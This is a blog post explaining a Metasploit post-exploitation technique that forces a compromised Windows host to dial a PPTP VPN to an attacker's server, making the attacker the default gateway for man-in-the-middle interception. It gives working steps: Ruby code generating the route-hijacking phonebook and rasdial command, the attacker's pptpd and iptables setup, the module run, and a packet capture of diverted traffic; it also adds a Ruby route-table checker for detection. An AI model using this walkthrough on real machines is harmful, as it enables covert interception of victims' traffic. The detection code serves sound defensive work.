
Wednesday, June 19, 2013

Metasploit: Man in the Middle through PPTP tunnel

Recently I wrote a small post-exploitation module that abuses the rasdial Windows client. The idea is to create an outbound PPTP VPN connection from the "victim" machine to a VPN server running on the "attacker" machine. Once the PPTP tunnel is up we can push all of the victim's traffic through the tunnel, which gives us a man-in-the-middle position.

To do this we create a temporary .pbk (phonebook) file with certain parameters and force rasdial to use that file. The parameter that matters most for the MITM is IpPrioritizeRemote. With it set, rasdial installs a new default route pointing at the new VPN peer address, i.e. the attacker host. This new default gateway gets a lower (better) metric than the existing one, so all outbound traffic to the Internet or to any network the host has no more specific route for goes through our machine; traffic to the victim's own LAN still uses the directly connected route. To turn this into a real MITM we obviously also need IP forwarding and masquerading on the attacker, which is easily done with iptables. For the tests I used the pptpd package from Debian as the VPN server. The simplest configuration is:
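To make the phonebook mechanism concrete, here is an added example in Ruby (the language Metasploit modules are written in). It is not the module's own code: it builds a minimal .pbk entry with IpPrioritizeRemote set, produces the rasdial command line that dials it, and parses phonebooks back so existing .pbk files on a host can be audited for the same trick. The key set (Encoding, Type, AutoLogon, VpnStrategy, MEDIA, Port, Device, DEVICE, PhoneNumber) is my assumption of a minimal working entry; Windows-generated phonebooks carry many more keys and the exact set rasdial needs can differ between Windows versions. The entry name, server address and paths used below are illustrative.

```ruby
# Added example, not the module's own code: build the temporary phonebook
# (.pbk) that rasdial consumes and the command line that dials it, plus a
# parser to audit .pbk files for the same trick. Assumption: this minimal
# key set is enough for rasdial; Windows-generated .pbk files carry many
# more keys and the required set can differ between Windows versions.

# Fixed keys of a PPTP VPN entry in the RAS phonebook format.
VPN_ENTRY_DEFAULTS = {
  'Encoding'    => '1',
  'Type'        => '2',   # 2 = VPN entry (1 = dial-up)
  'AutoLogon'   => '0',
  'VpnStrategy' => '1',   # 1 = PPTP only, no L2TP fallback
}.freeze

# Device/media section: which miniport to dial and the "phone number",
# which for a VPN entry is the server address (IP or hostname).
def device_section(server)
  ['MEDIA=rastapi', 'Port=VPN2-0', 'Device=WAN Miniport (PPTP)',
   'DEVICE=vpn', "PhoneNumber=#{server}"]
end

# IpPrioritizeRemote=1 is the key that makes the PPP peer the preferred
# default gateway (the metric-1 route shown in the post); with 0 Windows
# only adds a route for the remote network and leaves the LAN default.
def build_pbk(entry_name, server, prioritize_remote: true)
  unless entry_name.match?(/\A[A-Za-z0-9_]{1,32}\z/)
    raise ArgumentError, 'entry name must be a plain identifier'
  end
  lines = ["[#{entry_name}]"]
  VPN_ENTRY_DEFAULTS.each { |k, v| lines << "#{k}=#{v}" }
  lines << "IpPrioritizeRemote=#{prioritize_remote ? 1 : 0}"
  lines.concat(device_section(server))
  lines.join("\r\n") + "\r\n"   # CRLF: the file is consumed by a Windows client
end

# rasdial <entry> [user [password]] /PHONEBOOK:<file>
# Note the password is visible in the process command line while rasdial runs.
def rasdial_command(pbk_path, entry_name, username, password)
  %(rasdial #{entry_name} #{username} #{password} /PHONEBOOK:"#{pbk_path}")
end

# Parse an INI-style phonebook into { entry => { key => value } }.
def parse_pbk(text)
  entries = {}
  current = nil
  text.each_line do |raw|
    line = raw.strip
    next if line.empty? || line.start_with?(';')
    if (m = line.match(/\A\[(.+)\]\z/))
      current = entries[m[1]] = {}
    elsif current && (m = line.match(/\A([^=]+)=(.*)\z/))
      current[m[1]] = m[2]
    end
  end
  entries
end

# Names of VPN entries that would take over the default route when dialed:
# what to look for in %APPDATA%\Microsoft\Network\Connections\Pbk and in
# stray .pbk files under %TEMP% on a suspect host.
def route_hijacking_entries(text)
  parse_pbk(text)
    .select { |_, kv| kv['Type'] == '2' && kv['IpPrioritizeRemote'] == '1' }
    .keys
end

if $PROGRAM_NAME == __FILE__
  pbk = build_pbk('msf', '192.168.1.82')
  puts pbk
  puts rasdial_command('C:\\Temp\\msf.pbk', 'msf', 'msf', 'm3taSpl01t')
  puts "hijacking entries: #{route_hijacking_entries(pbk).inspect}"
end
```

Writing the output of build_pbk to a file and running the printed rasdial line on the victim reproduces what the module automates; route_hijacking_entries is the blue-team half, since a legitimate corporate VPN entry usually also has IpPrioritizeRemote=1, so the signal on a suspect host is an entry whose PhoneNumber is not a known VPN server, or a .pbk outside the normal phonebook directory.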


ATTACKER MACHINE

root@Mordor:~# tail -2 /etc/pptpd.conf
localip 192.168.0.1
remoteip 192.168.0.234-238

root@Mordor:~# tail -1 /etc/ppp/chap-secrets
msf * m3taSpl01t *

root@Mordor:~# /etc/init.d/pptpd restart && netstat -putan | grep 1723
Restarting PPTP: 
Stopping PPTP: pptpd.
Starting PPTP Daemon: pptpd.
tcp        0      0 0.0.0.0:1723            0.0.0.0:*               LISTEN      22027/pptpd 

root@Mordor:~# iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
root@Mordor:~# iptables -A FORWARD -i ppp0 -o wlan0 -j ACCEPT
root@Mordor:~# iptables -A FORWARD -i wlan0 -o ppp0 -m state --state ESTABLISHED,RELATED -j ACCEPT
root@Mordor:~# echo 1 > /proc/sys/net/ipv4/ip_forward

root@Mordor:~# ifconfig wlan0 | grep 82
          inet addr:192.168.1.82  Bcast:192.168.1.255  Mask:255.255.255.0

root@Mordor:~# route -n
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
192.168.1.0     0.0.0.0         255.255.255.0   U     0      0        0 wlan0
0.0.0.0         192.168.1.1     0.0.0.0         UG    0      0        0 wlan0

VICTIM MACHINE

C:\Documents and Settings\Peregrino>ipconfig

Windows IP Configuration

Ethernet adapter Wireless Network Connection:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 192.168.1.131
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.1.1

C:\Documents and Settings\Peregrino>route PRINT
===========================================================================

Active Routes:
Network Destination        Netmask          Gateway       Interface  Metric
          0.0.0.0          0.0.0.0      192.168.1.1   192.168.1.131      25
        127.0.0.0        255.0.0.0        127.0.0.1       127.0.0.1       1
      192.168.1.0    255.255.255.0    192.168.1.131   192.168.1.131      25
    192.168.1.131  255.255.255.255        127.0.0.1       127.0.0.1      25
    192.168.1.255  255.255.255.255    192.168.1.131   192.168.1.131      25
...

PPTP uses TCP port 1723 as its control channel and GRE (IP protocol 47, which is not a port) to carry the encapsulated data, so both must be allowed between victim and attacker. Bear this in mind if you use it over a WAN: a NAT device or firewall that passes TCP 1723 but drops or cannot track GRE will let the control connection complete and the tunnel will still fail to come up.

With this configuration you only need to run the module with the credentials configured above. USERNAME and PASSWORD must match the entry in /etc/ppp/chap-secrets exactly (the values in the run below are not the ones in the chap-secrets entry shown above; whichever pair you use, they have to match):

msf post(pptp_tunnel) > set PASSWORD M3taSpl01t
PASSWORD => M3taSpl01t
msf post(pptp_tunnel) > set USERNAME bmerino
USERNAME => bmerino
msf post(pptp_tunnel) > set RHOST 192.168.1.82
RHOST => 192.168.1.82
msf post(pptp_tunnel) > set session 1
session => 1
msf post(pptp_tunnel) > run

[+] PhoneBook configuration written to C:\DOCUME~1\PEREGR~1\CONFIG~1\Temp\UotYzylPVA.pbk
[*] 60
[*] Establishing connection ...
[+] Connection Successful
[*] Phonebook deleted
[*] Post module execution completed

Once the tunnel is up, the new interface appears on our attacker host:

root@Mordor:~# ifconfig ppp0 | grep Link -A 1
ppp0      Link encap:Point-to-Point Protocol  
              inet addr:192.168.0.1  P-t-P:192.168.0.234  Mask:255.255.255.255


And on the victim machine we can see the new interface and the new route:

C:\Documents and Settings\Peregrino>ipconfig

Windows IP Configuration

Ethernet adapter Wireless Network Connection:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 192.168.1.131
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.1.1

PPP adapter {34B7C931-D079-4817-8B5D-93A3C8CE6890}:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 192.168.0.234
        Subnet Mask . . . . . . . . . . . : 255.255.255.255
        Default Gateway . . . . . . . . . : 192.168.0.234

C:\Documents and Settings\Peregrino>route PRINT
===========================================================================

Active Routes:
Network Destination        Netmask          Gateway       Interface  Metric
          0.0.0.0          0.0.0.0    192.168.0.234   192.168.0.234       1
          0.0.0.0          0.0.0.0      192.168.1.1   192.168.1.131      26
        127.0.0.0        255.0.0.0        127.0.0.1       127.0.0.1       1
    192.168.0.234  255.255.255.255        127.0.0.1       127.0.0.1      50
    192.168.0.255  255.255.255.255    192.168.0.234   192.168.0.234      50
      192.168.1.0    255.255.255.0    192.168.1.131   192.168.1.131      25
     192.168.1.82  255.255.255.255    192.168.1.131   192.168.1.131      25
...
...

The new default route has a metric of 1 and points at the freshly created PPP interface, so it beats the original LAN default route, which has been bumped to metric 26. Windows also adds a /32 host route to the VPN server (192.168.1.82) through the LAN interface, so the tunnel's own PPTP and GRE traffic is not routed back into the tunnel. Now, if we leave tshark running on our wlan0 interface, we see all of that host's outbound traffic, already masqueraded with the attacker's address:

C:\Documents and Settings\Peregrino>ping www.metasploit.com

Pinging www.metasploit.com [208.118.237.137] with 32 bytes of data:

Reply from 208.118.237.137: bytes=32 time=171ms TTL=47
Reply from 208.118.237.137: bytes=32 time=175ms TTL=47
...
root@Mordor:~# tshark -i wlan0 -R icmp
Capturing on wlan0
  8.833077 192.168.1.82 -> 208.118.237.137 ICMP Echo (ping) request
  8.993497 208.118.237.137 -> 192.168.1.82 ICMP Echo (ping) reply
  9.837086 192.168.1.82 -> 208.118.237.137 ICMP Echo (ping) request
  9.999374 208.118.237.137 -> 192.168.1.82 ICMP Echo (ping) reply
 10.837070 192.168.1.82 -> 208.118.237.137 ICMP Echo (ping) request
 10.992455 208.118.237.137 -> 192.168.1.82 ICMP Echo (ping) reply
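The route table is also where a defender spots this. The following is an added Ruby example, not part of the original post: it parses the "Active Routes" table that `route PRINT` emits on Windows, finds the state the tunnel leaves behind (a preferred default route whose gateway is the PPP adapter's own address, with the LAN default still underneath it), and recovers the tunnel endpoint from the /32 host route Windows adds for the VPN server. The two embedded tables are the victim's routes from above, before and after the tunnel, reproduced as test input.

```ruby
# Added example, not from the original post: parse the "Active Routes"
# table printed by `route PRINT` on Windows and flag the state the PPTP
# trick leaves behind. The two samples are the victim's route tables from
# the post (before and after the tunnel), reproduced here as test input.
require 'ipaddr'

BEFORE_TUNNEL = <<~ROUTES
  Active Routes:
  Network Destination        Netmask          Gateway       Interface  Metric
            0.0.0.0          0.0.0.0      192.168.1.1   192.168.1.131      25
          127.0.0.0        255.0.0.0        127.0.0.1       127.0.0.1       1
        192.168.1.0    255.255.255.0    192.168.1.131   192.168.1.131      25
      192.168.1.131  255.255.255.255        127.0.0.1       127.0.0.1      25
      192.168.1.255  255.255.255.255    192.168.1.131   192.168.1.131      25
ROUTES

AFTER_TUNNEL = <<~ROUTES
  Active Routes:
  Network Destination        Netmask          Gateway       Interface  Metric
            0.0.0.0          0.0.0.0    192.168.0.234   192.168.0.234       1
            0.0.0.0          0.0.0.0      192.168.1.1   192.168.1.131      26
          127.0.0.0        255.0.0.0        127.0.0.1       127.0.0.1       1
      192.168.0.234  255.255.255.255        127.0.0.1       127.0.0.1      50
      192.168.0.255  255.255.255.255    192.168.0.234   192.168.0.234      50
        192.168.1.0    255.255.255.0    192.168.1.131   192.168.1.131      25
       192.168.1.82  255.255.255.255    192.168.1.131   192.168.1.131      25
ROUTES

Route = Struct.new(:dest, :mask, :gateway, :iface, :metric)

IPV4 = /\d{1,3}(?:\.\d{1,3}){3}/
ROUTE_LINE = /\A\s*(#{IPV4})\s+(#{IPV4})\s+(#{IPV4})\s+(#{IPV4})\s+(\d+)\s*\z/

# One Route per data row; header and separator lines do not match.
def parse_routes(text)
  text.each_line.map do |line|
    m = ROUTE_LINE.match(line)
    m && Route.new(m[1], m[2], m[3], m[4], m[5].to_i)
  end.compact
end

# All 0.0.0.0/0 routes, lowest metric first: Windows uses the first one.
def default_routes(text)
  parse_routes(text)
    .select { |r| r.dest == '0.0.0.0' && r.mask == '0.0.0.0' }
    .sort_by(&:metric)
end

# A PPP/VPN adapter's default route lists the adapter's own address as the
# gateway (point-to-point link); the LAN default route lists a separate
# router. When the winning default route is point-to-point and a LAN
# default still sits underneath it, off-link traffic has been diverted
# into the tunnel. Returns the diverting route, or nil.
def hijacked_default(text)
  defaults = default_routes(text)
  return nil if defaults.size < 2
  best = defaults.first
  lan  = defaults.drop(1).find { |r| r.gateway != r.iface }
  best.gateway == best.iface && lan ? best : nil
end

# The tunnel transport (TCP 1723 + GRE) must not loop into the tunnel, so
# Windows adds a /32 host route to the VPN server via the LAN interface.
# Those host routes name the tunnel endpoint, which is what an analyst
# wants from a compromised host. Subnet broadcast /32 routes on the same
# interface are filtered out so they are not reported as endpoints.
def tunnel_endpoints(text)
  routes = parse_routes(text)
  lan = default_routes(text).find { |r| r.gateway != r.iface }
  return [] unless lan
  broadcasts = routes
    .select { |r| r.iface == lan.iface && !%w[0.0.0.0 255.255.255.255].include?(r.mask) }
    .map { |r| IPAddr.new("#{r.dest}/#{r.mask}").to_range.last.to_s }
  broadcasts << '255.255.255.255'
  routes
    .select { |r| r.mask == '255.255.255.255' && r.iface == lan.iface }
    .reject { |r| broadcasts.include?(r.dest) }
    .map(&:dest)
end

if $PROGRAM_NAME == __FILE__
  r = hijacked_default(AFTER_TUNNEL)
  puts r ? "default route diverted to #{r.gateway} (metric #{r.metric})" : 'no diversion'
  puts "tunnel endpoints: #{tunnel_endpoints(AFTER_TUNNEL).join(', ')}"
end
```

Run against live `route PRINT` output (the English column layout is assumed; localized Windows prints the same data under translated headers, which the row regex ignores) the check is cheap enough to schedule on endpoints, and the endpoint list gives the address to block and to hunt for in firewall logs for TCP 1723 and GRE.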

Here is a how-to video:

2 comments:

  1. is it possible to implement this method through a reverse_https or firewall???

  2. this method is fantastic ... :-)
